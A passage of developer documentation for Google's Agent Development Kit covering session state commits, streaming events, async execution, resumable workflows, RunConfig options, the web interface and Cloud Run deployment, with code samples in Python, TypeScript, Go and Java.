'value_1' # State is locally set to 'value_1', but not yet committed by Runner # ... agent runs ... # Code in a tool called later *within the same invocation* # Readable (dirty read), but 'value_1' isn't guaranteed persistent yet. val = tool_context.state['field_1'] # 'val' will likely be 'value_1' here print(f"Dirty read value in tool: {val}") # Assume the event carrying the state_delta={'field_1': 'value_1'} # is yielded *after* this tool runs and is processed by the Runner. ``` ```typescript // Code in beforeAgentCallback callbackContext.state.set('field_1', 'value_1'); // State is locally set to 'value_1', but not yet committed by Runner // --- agent runs ... --- // --- Code in a tool called later *within the same invocation* --- // Readable (dirty read), but 'value_1' isn't guaranteed persistent yet. const val = toolContext.state.get('field_1'); // 'val' will likely be 'value_1' here console.log(`Dirty read value in tool: ${val}`); // Assume the event carrying the state_delta={'field_1': 'value_1'} // is yielded *after* this tool runs and is processed by the Runner. ``` ```go // Code in before_agent_callback // The callback would modify the context's session state directly. // This change is local to the current invocation context. ctx.State.Set("field_1", "value_1") // State is locally set to 'value_1', but not yet committed by Runner // ... agent runs ... // Code in a tool called later *within the same invocation* // Readable (dirty read), but 'value_1' isn't guaranteed persistent yet. val := ctx.State.Get("field_1") // 'val' will likely be 'value_1' here fmt.Printf("Dirty read value in tool: %v\n", val) // Assume the event carrying the state_delta={'field_1': 'value_1'} // is yielded *after* this tool runs and is processed by the Runner. ``` ```java // Modify state - Code in BeforeAgentCallback // AND stages this change in callbackContext.eventActions().stateDelta(). callbackContext.state().put("field_1", "value_1"); // --- agent runs ... --- // --- Code in a tool called later *within the same invocation* --- // Readable (dirty read), but 'value_1' isn't guaranteed persistent yet. Object val = toolContext.state().get("field_1"); // 'val' will likely be 'value_1' here System.out.println("Dirty read value in tool: " + val); // Assume the event carrying the state_delta={'field_1': 'value_1'} // is yielded *after* this tool runs and is processed by the Runner. ``` - **Implications:** - **Benefit:** Allows different parts of your logic within a single complex step (e.g., multiple callbacks or tool calls before the next LLM turn) to coordinate using state without waiting for a full yield/commit cycle. - **Caveat:** Relying heavily on dirty reads for critical logic can be risky. If the invocation fails *before* the event carrying the `state_delta` is yielded and processed by the `Runner`, the uncommitted state change will be lost. For critical state transitions, ensure they are associated with an event that gets successfully processed. ### Streaming vs. Non-Streaming Output (`partial=True`) This primarily relates to how responses from the LLM are handled, especially when using streaming generation APIs. - **Streaming:** The LLM generates its response token-by-token or in small chunks. - The framework (often within `BaseLlmFlow`) yields multiple `Event` objects for a single conceptual response. Most of these events will have `partial=True`. - The `Runner`, upon receiving an event with `partial=True`, typically **forwards it immediately** upstream (for UI display) but **skips processing its `actions`** (like `state_delta`). - Eventually, the framework yields a final event for that response, marked as non-partial (`partial=False` or implicitly via `turn_complete=True`). - The `Runner` **fully processes only this final event**, committing any associated `state_delta` or `artifact_delta`. - **Non-Streaming:** The LLM generates the entire response at once. The framework yields a single event marked as non-partial, which the `Runner` processes fully. - **Why it Matters:** Ensures that state changes are applied atomically and only once based on the *complete* response from the LLM, while still allowing the UI to display text progressively as it's generated. ## Async is Primary (`run_async`) - **Core Design:** The ADK Runtime is fundamentally built on asynchronous patterns and libraries (like Python's `asyncio`, Java's `RxJava`, and native `Promise`s and `AsyncGenerator`s in TypeScript) to handle concurrent operations (like waiting for LLM responses or tool executions) efficiently without blocking. - **Main Entry Point:** `Runner.run_async` is the primary method for executing agent invocations. All core runnable components (Agents, specific flows) use `asynchronous` methods internally. - **Synchronous Convenience (`run`):** A synchronous `Runner.run` method exists mainly for convenience (e.g., in simple scripts or testing environments). However, internally, `Runner.run` typically just calls `Runner.run_async` and manages the async event loop execution for you. - **Developer Experience:** We recommend designing your applications (e.g., web servers using ADK) to be asynchronous for best performance. In Python, this means using `asyncio`; in Java, leverage `RxJava`'s reactive programming model; and in TypeScript, this means building using native `Promise`s and `AsyncGenerator`s. - **Sync Callbacks/Tools:** The ADK framework supports both asynchronous and synchronous functions for tools and callbacks. - **Blocking I/O:** For long-running synchronous I/O operations, the framework attempts to prevent stalls. Python ADK may use asyncio.to_thread, while Java ADK often relies on appropriate RxJava schedulers or wrappers for blocking calls. In TypeScript, the framework simply awaits the function; if a synchronous function performs blocking I/O, it will stall the event loop. Developers should use asynchronous I/O APIs (which return a Promise) whenever possible. - **CPU-Bound Work:** Purely CPU-intensive synchronous tasks will still block their execution thread in both environments. Understanding these behaviors helps you write more robust ADK applications and debug issues related to state consistency, streaming updates, and asynchronous execution. # Resume stopped agents Supported in ADKPython v1.14.0 An ADK agent's execution can be interrupted by various factors including dropped network connections, power failure, or a required external system going offline. The Resume feature of ADK allows an agent workflow to pick up where it left off, avoiding the need to restart the entire workflow. In ADK Python 1.16 and higher, you can configure an ADK workflow to be resumable, so that it tracks the execution of workflow and then allows you to resume it after an unexpected interruption. This guide explains how to configure your ADK agent workflow to be resumable. If you use Custom Agents, you can update them to be resumable. For more information, see [Add resume to custom Agents](#custom-agents). ## Add resumable configuration Enable the Resume function for an agent workflow by applying a Resumability configuration to the App object of your ADK workflow, as shown in the following code example: ```python app = App( name='my_resumable_agent', root_agent=root_agent, # Set the resumability config to enable resumability. resumability_config=ResumabilityConfig( is_resumable=True, ), ) ``` Caution: Long Running Functions, Confirmations, Authentication For agents that use [Long Running Functions](/adk-docs/tools-custom/function-tools/#long-run-tool), [Confirmations](/adk-docs/tools-custom/confirmation/), or [Authentication](/adk-docs/tools-custom/authentication/) requiring user input, adding a resumable confirmation changes how these features operate. For more information, see the documentation for those features. Note: Custom Agents Resume is not supported by default for Custom Agents. You must update the agent code for a Custom Agent to support the Resume feature. For information on modifying Custom Agents to support incremental resume functionality, see [Add resume to custom Agents](#custom-agents). ## Resume a stopped workflow When an ADK workflow stops execution you can resume the workflow using a command containing the Invocation ID for the workflow instance, which can be found in the [Event](/adk-docs/events/#understanding-and-using-events) history of the workflow. Make sure the ADK API server is running, in case it was interrupted or powered off, and then run the following command to resume the workflow, as shown in the following API request example. ```console # restart the API server if needed: adk api_server my_resumable_agent/ # resume the agent: curl -X POST http://localhost:8000/run_sse \ -H "Content-Type: application/json" \ -d '{ "app_name": "my_resumable_agent", "user_id": "u_123", "session_id": "s_abc", "invocation_id": "invocation-123", }' ``` You can also resume a workflow using the Runner object Run Async method, as shown below: ```python runner.run_async(user_id='u_123', session_id='s_abc', invocation_id='invocation-123') # When new_message is set to a function response, # we are trying to resume a long running function. ``` Note Resuming a workflow from the ADK Web user interface or using the ADK command line (CLI) tool is not currently supported. ## How it works The Resume feature works by logging completed Agent workflow tasks, including incremental steps using [Events](/adk-docs/events/) and [Event Actions](/adk-docs/events/#detecting-actions-and-side-effects). tracking completion of agent tasks within a resumable workflow. If a workflow is interrupted and then later restarted, the system resumes the workflow by setting the completion state of each agent. If an agent did not complete, the workflow system reinstates any completed Events for that agent, and restarts the workflow from the partially completed state. For multi-agent workflows, the specific resume behavior varies, based on the multi-agent classes in your workflow, as described below: - **Sequential Agent**: Reads the current_sub_agent from its saved state to find the next sub-agent to run in the sequence. - **Loop Agent**: Uses the current_sub_agent and times_looped values to continue the loop from the last completed iteration and sub-agent. - **Parallel Agent**: Determines which sub-agents have already completed and only runs those that have not finished. Event logging includes results from Tools which successfully returned a result. So if an agent successfully executed Function Tools A and B, and then failed during execution of tool C, the system reinstates the results from the tools A and B, and resumes the workflow by re-running the tool C request. Caution: Tool execution behavior When resuming a workflow with Tools, the Resume feature ensures that the Tools in an agent are run ***at least once***, and may run more than once when resuming a workflow. If your agent uses Tools where duplicate runs would have a negative impact, such as purchases, you should modify the Tool to check for and prevent duplicate runs. Note: Workflow modification with Resume not supported Do not modify a stopped agent workflow before resuming it. For example adding or removing agents from workflow that has stopped and then resuming that workflow is not supported. ## Add resume to custom Agents Custom agents have specific implementation requirements in order to support resumability. You must decide on and define workflow steps within your custom agent which produce a result which can be preserved before handing off to the next step of processing. The following steps outline how to modify a Custom Agent to support a workflow Resume. - **Create CustomAgentState class**: Extend the BaseAgentState to create an object that preserves the state of your agent. - **Optionally, create WorkFlowStep class**: If your custom agent has sequential steps, consider creating a WorkFlowStep list object that defines the discrete, savable steps of the agent. - **Add initial agent state:** Modify your agent's async run function to set the initial state of your agent. - **Add agent state checkpoints**: Modify your agent's async run function to generate and save the agent state for each completed step of the agent's overall task. - **Add end of agent status to track agent state:** Modify your agent's async run function to include an `end_of_agent=True` status upon successful completion of the agent's full task. The following example shows the required code modifications to the example StoryFlowAgent class shown in the [Custom Agents](/adk-docs/agents/custom-agents/#full-code-example) guide: ```python class WorkflowStep(int, Enum): INITIAL_STORY_GENERATION = 1 CRITIC_REVISER_LOOP = 2 POST_PROCESSING = 3 CONDITIONAL_REGENERATION = 4 # Extend BaseAgentState ### class StoryFlowAgentState(BaseAgentState): ### step = WorkflowStep @override async def _run_async_impl( self, ctx: InvocationContext ) -> AsyncGenerator[Event, None]: """ Implements the custom orchestration logic for the story workflow. Uses the instance attributes assigned by Pydantic (e.g., self.story_generator). """ agent_state = self._load_agent_state(ctx, WorkflowStep) if agent_state is None: # Record the start of the agent agent_state = StoryFlowAgentState(step=WorkflowStep.INITIAL_STORY_GENERATION) yield self._create_agent_state_event(ctx, agent_state) next_step = agent_state.step logger.info(f"[{self.name}] Starting story generation workflow.") # Step 1. Initial Story Generation if next_step <= WorkflowStep.INITIAL_STORY_GENERATION: logger.info(f"[{self.name}] Running StoryGenerator...") async for event in self.story_generator.run_async(ctx): yield event # Check if story was generated before proceeding if "current_story" not in ctx.session.state or not ctx.session.state[ "current_story" ]: return # Stop processing if initial story failed agent_state = StoryFlowAgentState(step=WorkflowStep.CRITIC_REVISER_LOOP) yield self._create_agent_state_event(ctx, agent_state) # Step 2. Critic-Reviser Loop if next_step <= WorkflowStep.CRITIC_REVISER_LOOP: logger.info(f"[{self.name}] Running CriticReviserLoop...") async for event in self.loop_agent.run_async(ctx): logger.info( f"[{self.name}] Event from CriticReviserLoop: " f"{event.model_dump_json(indent=2, exclude_none=True)}" ) yield event agent_state = StoryFlowAgentState(step=WorkflowStep.POST_PROCESSING) yield self._create_agent_state_event(ctx, agent_state) # Step 3. Sequential Post-Processing (Grammar and Tone Check) if next_step <= WorkflowStep.POST_PROCESSING: logger.info(f"[{self.name}] Running PostProcessing...") async for event in self.sequential_agent.run_async(ctx): logger.info( f"[{self.name}] Event from PostProcessing: " f"{event.model_dump_json(indent=2, exclude_none=True)}" ) yield event agent_state = StoryFlowAgentState(step=WorkflowStep.CONDITIONAL_REGENERATION) yield self._create_agent_state_event(ctx, agent_state) # Step 4. Tone-Based Conditional Logic if next_step <= WorkflowStep.CONDITIONAL_REGENERATION: tone_check_result = ctx.session.state.get("tone_check_result") if tone_check_result == "negative": logger.info(f"[{self.name}] Tone is negative. Regenerating story...") async for event in self.story_generator.run_async(ctx): logger.info( f"[{self.name}] Event from StoryGenerator (Regen): " f"{event.model_dump_json(indent=2, exclude_none=True)}" ) yield event else: logger.info(f"[{self.name}] Tone is not negative. Keeping current story.") logger.info(f"[{self.name}] Workflow finished.") yield self._create_agent_state_event(ctx, end_of_agent=True) ``` # Runtime Configuration Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.1.0 `RunConfig` defines runtime behavior and options for agents in ADK. It controls speech and streaming settings, function calling, artifact saving, and limits on LLM calls. When constructing an agent run, you can pass a `RunConfig` to customize how the agent interacts with models, handles audio, and streams responses. By default, no streaming is enabled and inputs aren’t retained as artifacts. Use `RunConfig` to override these defaults. ## Class Definition The `RunConfig` class holds configuration parameters for an agent's runtime behavior. - Python ADK uses Pydantic for this validation. - Go ADK has mutable structs by default. - Java ADK typically uses immutable data classes. - TypeScript ADK uses a standard interface, with type safety provided by the TypeScript compiler. ```python class RunConfig(BaseModel): """Configs for runtime behavior of agents.""" model_config = ConfigDict( extra='forbid', ) speech_config: Optional[types.SpeechConfig] = None response_modalities: Optional[list[str]] = None save_input_blobs_as_artifacts: bool = False support_cfc: bool = False streaming_mode: StreamingMode = StreamingMode.NONE output_audio_transcription: Optional[types.AudioTranscriptionConfig] = None max_llm_calls: int = 500 ``` ```typescript export interface RunConfig { speechConfig?: SpeechConfig; responseModalities?: Modality[]; saveInputBlobsAsArtifacts: boolean; supportCfc: boolean; streamingMode: StreamingMode; outputAudioTranscription?: AudioTranscriptionConfig; maxLlmCalls: number; // ... and other properties } export enum StreamingMode { NONE = 'none', SSE = 'sse', BIDI = 'bidi', } ``` ```go type StreamingMode string const ( StreamingModeNone StreamingMode = "none" StreamingModeSSE StreamingMode = "sse" ) // RunConfig controls runtime behavior. type RunConfig struct { // Streaming mode, None or StreamingMode.SSE. StreamingMode StreamingMode // Whether or not to save the input blobs as artifacts SaveInputBlobsAsArtifacts bool } ``` ```java public abstract class RunConfig { public enum StreamingMode { NONE, SSE, BIDI } public abstract @Nullable SpeechConfig speechConfig(); public abstract ImmutableList responseModalities(); public abstract boolean saveInputBlobsAsArtifacts(); public abstract @Nullable AudioTranscriptionConfig outputAudioTranscription(); public abstract int maxLlmCalls(); // ... } ``` ## Runtime Parameters | Parameter | Python Type | TypeScript Type | Go Type | Java Type | Default (Py / TS / Go / Java) | Description | | ------------------------------- | ------------------------------------------ | ------------------------------------- | --------------- | ----------------------------------------------------- | ---------------------------------------------------------------------------------------------- | ----------------------------------------------------------------------------------------------------------------------------------------------------------- | | `speech_config` | `Optional[types.SpeechConfig]` | `SpeechConfig` (optional) | N/A | `SpeechConfig` (nullable via `@Nullable`) | `None` / `undefined`/ N/A / `null` | Configures speech synthesis (voice, language) using the `SpeechConfig` type. | | `response_modalities` | `Optional[list[str]]` | `Modality[]` (optional) | N/A | `ImmutableList` | `None` / `undefined` / N/A / Empty `ImmutableList` | List of desired output modalities (e.g., Python: `["TEXT", "AUDIO"]`; Java/TS: uses structured `Modality` objects). | | `save_input_blobs_as_artifacts` | `bool` | `boolean` | `bool` | `boolean` | `False` / `false` / `false` / `false` | If `true`, saves input blobs (e.g., uploaded files) as run artifacts for debugging/auditing. | | `streaming_mode` | `StreamingMode` | `StreamingMode` | `StreamingMode` | `StreamingMode` | `StreamingMode.NONE` / `StreamingMode.NONE` / `agent.StreamingModeNone` / `StreamingMode.NONE` | Sets the streaming behavior: `NONE` (default), `SSE` (server-sent events), or `BIDI` (bidirectional). | | `output_audio_transcription` | `Optional[types.AudioTranscriptionConfig]` | `AudioTranscriptionConfig` (optional) | N/A | `AudioTranscriptionConfig` (nullable via `@Nullable`) | `None` / `undefined` / N/A / `null` | Configures transcription of generated audio output using the `AudioTranscriptionConfig` type. | | `max_llm_calls` | `int` | `number` | N/A | `int` | `500` / `500` / N/A / `500` | Limits total LLM calls per run. `0` or negative means unlimited. Exceeding language limits (e.g. `sys.maxsize`, `Number.MAX_SAFE_INTEGER`) raises an error. | | `support_cfc` | `bool` | `boolean` | N/A | `bool` | `False` / `false` / N/A / `false` | **Python/TypeScript:** Enables Compositional Function Calling. Requires `streaming_mode=SSE` and uses the LIVE API. **Experimental.** | ### `speech_config` Supported in ADKPython v0.1.0Java v0.1.0 Note The interface or definition of `SpeechConfig` is the same, irrespective of the language. Speech configuration settings for live agents with audio capabilities. The `SpeechConfig` class has the following structure: ```python class SpeechConfig(_common.BaseModel): """The speech generation configuration.""" voice_config: Optional[VoiceConfig] = Field( default=None, description="""The configuration for the speaker to use.""", ) language_code: Optional[str] = Field( default=None, description="""Language code (ISO 639. e.g. en-US) for the speech synthesization. Only available for Live API.""", ) ``` The `voice_config` parameter uses the `VoiceConfig` class: ```python class VoiceConfig(_common.BaseModel): """The configuration for the voice to use.""" prebuilt_voice_config: Optional[PrebuiltVoiceConfig] = Field( default=None, description="""The configuration for the speaker to use.""", ) ``` And `PrebuiltVoiceConfig` has the following structure: ```python class PrebuiltVoiceConfig(_common.BaseModel): """The configuration for the prebuilt speaker to use.""" voice_name: Optional[str] = Field( default=None, description="""The name of the prebuilt voice to use.""", ) ``` These nested configuration classes allow you to specify: - `voice_config`: The name of the prebuilt voice to use (in the `PrebuiltVoiceConfig`) - `language_code`: ISO 639 language code (e.g., "en-US") for speech synthesis When implementing voice-enabled agents, configure these parameters to control how your agent sounds when speaking. ### `response_modalities` Supported in ADKPython v0.1.0Java v0.1.0 Defines the output modalities for the agent. If not set, defaults to AUDIO. Response modalities determine how the agent communicates with users through various channels (e.g., text, audio). ### `save_input_blobs_as_artifacts` Supported in ADKPython v0.1.0Go v0.1.0Java v0.1.0 When enabled, input blobs will be saved as artifacts during agent execution. This is useful for debugging and audit purposes, allowing developers to review the exact data received by agents. ### `support_cfc` Supported in ADKPython v0.1.0Experimental Enables Compositional Function Calling (CFC) support. Only applicable when using StreamingMode.SSE. When enabled, the LIVE API will be invoked as only it supports CFC functionality. Experimental release The `support_cfc` feature is experimental and its API or behavior might change in future releases. ### `streaming_mode` Supported in ADKPython v0.1.0Go v0.1.0 Configures the streaming behavior of the agent. Possible values: - `StreamingMode.NONE`: No streaming; responses delivered as complete units - `StreamingMode.SSE`: Server-Sent Events streaming; one-way streaming from server to client - `StreamingMode.BIDI`: Bidirectional streaming; simultaneous communication in both directions Streaming modes affect both performance and user experience. SSE streaming lets users see partial responses as they're generated, while BIDI streaming enables real-time interactive experiences. ### `output_audio_transcription` Supported in ADKPython v0.1.0Java v0.1.0 Configuration for transcribing audio outputs from live agents with audio response capability. This enables automatic transcription of audio responses for accessibility, record-keeping, and multi-modal applications. ### `max_llm_calls` Supported in ADKPython v0.1.0Java v0.1.0 Sets a limit on the total number of LLM calls for a given agent run. - Values greater than 0 and less than `sys.maxsize`: Enforces a bound on LLM calls - Values less than or equal to 0: Allows unbounded LLM calls *(not recommended for production)* This parameter prevents excessive API usage and potential runaway processes. Since LLM calls often incur costs and consume resources, setting appropriate limits is crucial. ## Validation Rules Supported in ADKPython v0.1.0Typescript v0.2.0Go v0.1.0Java v0.1.0 The `RunConfig` class validates its parameters to ensure proper agent operation. While Python ADK uses `Pydantic` for automatic type validation, Java and TypeScript ADK rely on their static type systems and may include explicit checks in the `RunConfig`'s constructor. For the `max_llm_calls` parameter specifically: 1. Extremely large values (like `sys.maxsize` in Python, `Integer.MAX_VALUE` in Java, or `Number.MAX_SAFE_INTEGER` in TypeScript) are typically disallowed to prevent issues. 1. Values of zero or less will usually trigger a warning about unlimited LLM interactions. ### Basic runtime configuration ```python from google.genai.adk import RunConfig, StreamingMode config = RunConfig( streaming_mode=StreamingMode.NONE, max_llm_calls=100 ) ``` ```typescript import { RunConfig, StreamingMode } from '@google/adk'; const config: RunConfig = { streamingMode: StreamingMode.NONE, maxLlmCalls: 100, }; ``` ```go import "google.golang.org/adk/agent" config := agent.RunConfig{ StreamingMode: agent.StreamingModeNone, } ``` ```java import com.google.adk.agents.RunConfig; import com.google.adk.agents.RunConfig.StreamingMode; RunConfig config = RunConfig.builder() .setStreamingMode(StreamingMode.NONE) .setMaxLlmCalls(100) .build(); ``` This configuration creates a non-streaming agent with a limit of 100 LLM calls, suitable for simple task-oriented agents where complete responses are preferable. ### Enabling streaming ```python from google.genai.adk import RunConfig, StreamingMode config = RunConfig( streaming_mode=StreamingMode.SSE, max_llm_calls=200 ) ``` ```typescript import { RunConfig, StreamingMode } from '@google/adk'; const config: RunConfig = { streamingMode: StreamingMode.SSE, maxLlmCalls: 200, }; ``` ```go import "google.golang.org/adk/agent" config := agent.RunConfig{ StreamingMode: agent.StreamingModeSSE, } ``` ```java import com.google.adk.agents.RunConfig; import com.google.adk.agents.RunConfig.StreamingMode; RunConfig config = RunConfig.builder() .setStreamingMode(StreamingMode.SSE) .setMaxLlmCalls(200) .build(); ``` Using SSE streaming allows users to see responses as they're generated, providing a more responsive feel for chatbots and assistants. ### Enabling speech support ```python from google.genai.adk import RunConfig, StreamingMode from google.genai import types config = RunConfig( speech_config=types.SpeechConfig( language_code="en-US", voice_config=types.VoiceConfig( prebuilt_voice_config=types.PrebuiltVoiceConfig( voice_name="Kore" ) ), ), response_modalities=["AUDIO", "TEXT"], save_input_blobs_as_artifacts=True, support_cfc=True, streaming_mode=StreamingMode.SSE, max_llm_calls=1000, ) ``` ```typescript import { RunConfig, StreamingMode } from '@google/adk'; const config: RunConfig = { speechConfig: { languageCode: "en-US", voiceConfig: { prebuiltVoiceConfig: { voiceName: "Kore" } }, }, responseModalities: [ { modality: "AUDIO" }, { modality: "TEXT" } ], saveInputBlobsAsArtifacts: true, supportCfc: true, streamingMode: StreamingMode.SSE, maxLlmCalls: 1000, }; ``` ```java import com.google.adk.agents.RunConfig; import com.google.adk.agents.RunConfig.StreamingMode; import com.google.common.collect.ImmutableList; import com.google.genai.types.Content; import com.google.genai.types.Modality; import com.google.genai.types.Part; import com.google.genai.types.PrebuiltVoiceConfig; import com.google.genai.types.SpeechConfig; import com.google.genai.types.VoiceConfig; RunConfig runConfig = RunConfig.builder() .setStreamingMode(StreamingMode.SSE) .setMaxLlmCalls(1000) .setSaveInputBlobsAsArtifacts(true) .setResponseModalities(ImmutableList.of(new Modality("AUDIO"), new Modality("TEXT"))) .setSpeechConfig( SpeechConfig.builder() .voiceConfig( VoiceConfig.builder() .prebuiltVoiceConfig( PrebuiltVoiceConfig.builder().voiceName("Kore").build()) .build()) .languageCode("en-US") .build()) .build(); ``` This comprehensive example configures an agent with: - Speech capabilities using the "Kore" voice (US English) - Both audio and text output modalities - Artifact saving for input blobs (useful for debugging) - Experimental CFC support enabled **(Python and TypeScript)** - SSE streaming for responsive interaction - A limit of 1000 LLM calls ### Enabling CFC Support Supported in ADKPython v0.1.0Typescript v0.2.0Experimental ```python from google.genai.adk import RunConfig, StreamingMode config = RunConfig( streaming_mode=StreamingMode.SSE, support_cfc=True, max_llm_calls=150 ) ``` ```typescript import { RunConfig, StreamingMode } from '@google/adk'; const config: RunConfig = { streamingMode: StreamingMode.SSE, supportCfc: true, maxLlmCalls: 150, }; ``` Enabling Compositional Function Calling (CFC) creates an agent that can dynamically execute functions based on model outputs, powerful for applications requiring complex workflows. Experimental release The Compositional Function Calling (CFC) streaming feature is an experimental release. # Use the Web Interface Supported in ADKPython v0.1.0TypeScript v0.2.0Go v0.1.0Java v0.1.0 The ADK web interface lets you test your agents directly in the browser. This tool provides a simple way to interactively develop and debug your agents. Caution: ADK Web for development only ADK Web is ***not meant for use in production deployments***. You should use ADK Web for development and debugging purposes only. ## Start the web interface Use the following command to run your agent in the ADK web interface: ```shell adk web ``` ```shell npx adk web ``` ```shell go run agent.go web api webui ``` Make sure to update the port number. With Maven, compile and run the ADK web server: ```console mvn compile exec:java \ -Dexec.args="--adk.agents.source-dir=src/main/java/agents --server.port=8080" ``` With Gradle, the `build.gradle` or `build.gradle.kts` build file should have the following Java plugin in its plugins section: ```groovy plugins { id('java') // other plugins } ``` Then, elsewhere in the build file, at the top-level, create a new task: ```groovy tasks.register('runADKWebServer', JavaExec) { dependsOn classes classpath = sourceSets.main.runtimeClasspath mainClass = 'com.google.adk.web.AdkWebServer' args '--adk.agents.source-dir=src/main/java/agents', '--server.port=8080' } ``` Finally, on the command-line, run the following command: ```console gradle runADKWebServer ``` In Java, the Web Interface and the API server are bundled together. The server starts on `http://localhost:8000` by default: ```shell +-----------------------------------------------------------------------------+ | ADK Web Server started | | | | For local testing, access at http://localhost:8000. | +-----------------------------------------------------------------------------+ ``` ## Features Key features of the ADK web interface include: - **Chat interface**: Send messages to your agents and view responses in real-time - **Session management**: Create and switch between sessions - **State inspection**: View and modify session state during development - **Event history**: Inspect all events generated during agent execution ## Common options | Option | Description | Default | | ------------------------ | ---------------------------------- | ---------------------- | | `--port` | Port to run the server on | `8000` | | `--host` | Host binding address | `127.0.0.1` | | `--session_service_uri` | Custom session storage URI | In-memory | | `--artifact_service_uri` | Custom artifact storage URI | Local `.adk/artifacts` | | `--reload/--no-reload` | Enable auto-reload on code changes | `true` | ### Example with options ```shell adk web --port 3000 --session_service_uri "sqlite:///sessions.db" ``` # Deploying Your Agent Once you've built and tested your agent using ADK, the next step is to deploy it so it can be accessed, queried, and used in production or integrated with other applications. Deployment moves your agent from your local development machine to a scalable and reliable environment. ## Deployment Options Your ADK agent can be deployed to a range of different environments based on your needs for production readiness or custom flexibility: ### Agent Engine in Vertex AI [Agent Engine](https://google.github.io/adk-docs/deploy/agent-engine/index.md) is a fully managed auto-scaling service on Google Cloud specifically designed for deploying, managing, and scaling AI agents built with frameworks such as ADK. Learn more about [deploying your agent to Vertex AI Agent Engine](https://google.github.io/adk-docs/deploy/agent-engine/index.md). ### Cloud Run [Cloud Run](https://cloud.google.com/run) is a managed auto-scaling compute platform on Google Cloud that enables you to run your agent as a container-based application. Learn more about [deploying your agent to Cloud Run](https://google.github.io/adk-docs/deploy/cloud-run/index.md). ### Google Kubernetes Engine (GKE) [Google Kubernetes Engine (GKE)](https://cloud.google.com/kubernetes-engine) is a managed Kubernetes service of Google Cloud that allows you to run your agent in a containerized environment. GKE is a good option if you need more control over the deployment as well as for running Open Models. Learn more about [deploying your agent to GKE](https://google.github.io/adk-docs/deploy/gke/index.md). ### Other Container-friendly Infrastructure You can manually package your Agent into a container image and then run it in any environment that supports container images. For example you can run it locally in Docker or Podman. This is a good option if you prefer to run offline or disconnected, or otherwise in a system that has no connection to Google Cloud. Follow the instructions for [deploying your agent to Cloud Run](https://google.github.io/adk-docs/deploy/cloud-run/#deployment-commands). In the "Deployment Commands" section for gcloud CLI, you will find an example FastAPI entry point and Dockerfile. # Deploy to Cloud Run Supported in ADKPythonGoJava [Cloud Run](https://cloud.google.com/run) is a fully managed platform that enables you to run your code directly on top of Google's scalable infrastructure. To deploy your agent, you can use either the `adk deploy cloud_run` command *(recommended for Python)*, or with `gcloud run deploy` command through Cloud Run. ## Agent sample For each of the commands, we will reference the `Capital Agent` sample defined on the [LLM agent](https://google.github.io/adk-docs/agents/llm-agents/index.md) page. We will assume it's in a directory (eg: `capital_agent`). To proceed, confirm that your agent code is configured as follows: 1. Agent code is in a file called `agent.py` within your agent directory. 1. Your agent variable is named `root_agent`. 1. `__init__.py` is within your agent directory and contains `from . import agent`. 1. Your `requirements.txt` file is present in the agent directory. 1. Your application's entry point (the main package and main() function) is in a single Go file. Using main.go is a strong convention. 1. Your agent instance is passed to a launcher configuration, typically using agent.NewSingleLoader(yourAgent). The adkgo tool uses this launcher to start your agent with the correct services. 1. Your go.mod and go.sum files are present in your project directory to manage dependencies. Refer to the following section for more details. You can also find a [sample app](https://github.com/google/adk-docs/tree/main/examples/go/cloud-run) in the Github repo. 1. Agent code is in a file called `CapitalAgent.java` within your agent directory. 1. Your agent variable is global and follows the format `public static final BaseAgent ROOT_AGENT`. 1. Your agent definition is present in a static class method. Refer to the following section for more details. You can also find a [sample app](https://github.com/google/adk-docs/tree/main/examples/java/cloud-run) in the Github repo. ## Environment variables Set your environment variables as described in the [Setup and Installation](https://google.github.io/adk-docs/get-started/installation/index.md) guide. ```bash export GOOGLE_CLOUD_PROJECT=your-project-id export GOOGLE_CLOUD_LOCATION=us-central1 # Or your preferred location export GOOGLE_GENAI_USE_VERTEXAI=True ``` *(Replace `your-project-id` with your actual GCP project ID)* Alternatively you can also use an API key from AI Studio ```bash export GOOGLE_CLOUD_PROJECT=your-project-id export GOOGLE_CLOUD_LOCATION=us-central1 # Or your preferred location export GOOGLE_GENAI_USE_VERTEXAI=FALSE export GOOGLE_API_KEY=your-api-key ``` *(Replace `your-project-id` with your actual GCP project ID and `your-api-key` with your actual API key from AI Studio)* ## Prerequisites 1. You should have a Google Cloud project. You need to know your: 1. Project name (i.e. "my-project") 1. Project location (i.e. "us-central1") 1. Service account (i.e. "1234567890-compute@developer.gserviceaccount.com") 1. GOOGLE_API_KEY ## Secret Please make sure you have created a secret which can be read by your service account. ### Entry for GOOGLE_API_KEY secret You can create your secret manually or use CLI: ```bash echo "<>" | gcloud secrets create GOOGLE_API_KEY --project=my-project --data-file=- ``` ### Permissions to read You should give appropriate permission for you service account to read this secret. ```bash gcloud secrets add-iam-policy-binding GOOGLE_API_KEY --member="serviceAccount:1234567890-compute@developer.gserviceaccount.com" --role="roles/secretmanager.secretAccessor" --project=my-project ``` ## Deployment payload When you deploy your ADK agent workflow to the Google Cloud Run, the following content is uploaded to the service: - Your ADK agent code - Any dependencies declared in your ADK agent code - ADK API server code version used by your agent The default deployment *does not* include the ADK web user interface libraries, unless you specify it as deployment setting, such as the `--with_ui` option for `adk deploy cloud_run` command. ## Deployment commands ### adk CLI The `adk deploy cloud_run` command deploys your agent code to Google Cloud Run. Ensure you have authenticated with Google Cloud (`gcloud auth login` and `gcloud config set project `). #### Setup environment variables Optional but recommended: Setting environment variables can make the deployment commands cleaner. ```bash # Set your Google Cloud Project ID export GOOGLE_CLOUD_PROJECT="your-gcp-project-id" # Set your desired Google Cloud Location export GOOGLE_CLOUD_LOCATION="us-central1" # Example location # Set the path to your agent code directory export AGENT_PATH="./capital_agent" # Assuming capital_agent is in the current directory # Set a name for your Cloud Run service (optional) export SERVICE_NAME="capital-agent-service" # Set an application name (optional) export APP_NAME="capital_agent_app" ``` #### Command usage ##### Minimal command ```bash adk deploy cloud_run \ --project=$GOOGLE_CLOUD_PROJECT \ --region=$GOOGLE_CLOUD_LOCATION \ $AGENT_PATH ``` ##### Full command with optional flags ```bash adk deploy cloud_run \ --project=$GOOGLE_CLOUD_PROJECT \ --region=$GOOGLE_CLOUD_LOCATION \ --service_name=$SERVICE_NAME \ --app_name=$APP_NAME \ --with_ui \ $AGENT_PATH ``` ##### Arguments - `AGENT_PATH`: (Required) Positional argument specifying the path to the directory containing your agent's source code (e.g., `$AGENT_PATH` in the examples, or `capital_agent/`). This directory must contain at least an `__init__.py` and your main agent file (e.g., `agent.py`). ##### Options - `--project TEXT`: (Required) Your Google Cloud project ID (e.g., `$GOOGLE_CLOUD_PROJECT`). - `--region TEXT`: (Required) The Google Cloud location for deployment (e.g., 